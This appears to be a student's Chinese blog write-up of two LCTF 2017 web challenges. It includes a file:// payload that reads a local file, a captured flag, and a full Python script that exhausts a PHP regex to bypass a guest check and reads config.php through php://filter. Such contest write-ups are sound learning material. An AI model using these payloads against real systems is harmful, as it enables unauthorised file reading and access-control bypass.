2018-01-15

2017 LCTF 学习体会

1. web签到题:

用file协议可以读取本地文件

要绕过逻辑中对host的检查,需要用到curl命令,curl支持file://host/path, file://path 这两种形式,都会访问到本地文件

截断url后面拼接的/, GET请求,用?#都可以

Payload:

  file://www.baidu.com/etc/flag?

LCTF{1eTus_q14ndao_B4_387t439hg9342}

之前自己做的时候想到本地代理一般都是设置为127.0.0.1:8080, 试过之后发现不行,查询之后发现它只是本机的一个回送地址,不进行网络传输


2. 萌萌哒的报名系统:

这题提示给了IDE,从大佬的wp中知道PHP有款强大的IDE叫做PHPSTORM,它新建项目时会产生一个.idea文件夹,payload: http://123.206.120.239/.idea/ 访问文件夹

发现有一个xdcms2333.zip, payload: http://123.206.120.239/xdcms2333.zip? 下载这个压缩包,打开得到整站源码:

查看了login.php和member.php 没有发现什么有用的东西,看register.php 时, 有以下两处关键代码:

$admin = "xdsec"."###".str_shuffle('you_are_the_member_of_xdsec_here_is_your_flag');

preg_match('/^(xdsec)((?:###|\w)+)$/i', $code, $matches);

如果匹配了$matches[0]=$admin,就可以把xdsec注册到identities表中去,这样我们就可以绕过member.php中的:

$sth->execute([':username' => $_SESSION['username']]);

    if ($sth->fetch()[0] === 'GUEST') {

        $_SESSION['is_guest'] = true;

}

  但是str_shuffle是不可预测的。所以要另找方法,很多人用的非预期解—条件竞争,如果在identities表中没有username这一行数据,那么取出来$sth->fetch[0]的结果就为null,可绕过第一层,所以可以用Python多线程注册用户,(没试过)。

其实正解是通过pre_match函数的资源消耗来绕过,喂给pre_match一个很长的字符串,会导致pre_match消耗大量资源从而导致后面的php不会执行。

脚本如下:

# !/usr/bin/env python

# -*- coding: utf-8 -*-

import requests

import threading

import re

import os

__author__ = "hahahha"


s = requests.session()


url = 'http://123.206.120.239/'

url1 = url+'register.php'

url2 = url+'login.php'

url3 = url+'member.php?file=php://filter/resource=config.php'


headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0'}


def register():

    data = {

        'username':'Asdfgh',

        'password':'123456',

        'code':'xdsec###'+'A'*1000000

        }

    try:

        res1=s.post(url1,headers=headers,data=data,timeout=10)

        print (res1.text)

    except:

        pass


def login():

    data = {

        'username':'Asdfgh',

        'password':'123456'

        }

    res2=s.post(url2,headers=headers,data=data)

    print (res2.text)


def member():

    res3 = s.get(url3,headers=headers)

    print (res3.text)


if __name__=='__main__':

    register()

    login()

    member()


脚本是看别人的,在这里也总结一下,一般的应该怎么写:

Requests是Python的第三方库,需要自己下载安装才能使用,这次用到的是web提交的基本使用,requsets.session()是一个会话,requests.session().post(url,headers,data,timeout), 其中headers只把User-Agent 添加进去就行了,不过要添加完整,我做的时候就复制少了,所以一直出不来,print(res.txet)打印的内容要规范一点,最好别用(res.content)。

经过这道题,我觉得我要学的东西还很多,PHP代码审计,正则表达式是很重要的,等Python的老师讲有点等不及了,先自己看看吧,再实践实践,Python也用得不是很熟。加油吧,少年!


注:自己实在是太菜,复现都只能做出两道题来,唉唉唉!最近刚半期考完,数电成绩很不理想,英语六级也快要考了,花在这方面的时间可能会要少一点。

你可能感兴趣的:(2018-01-15)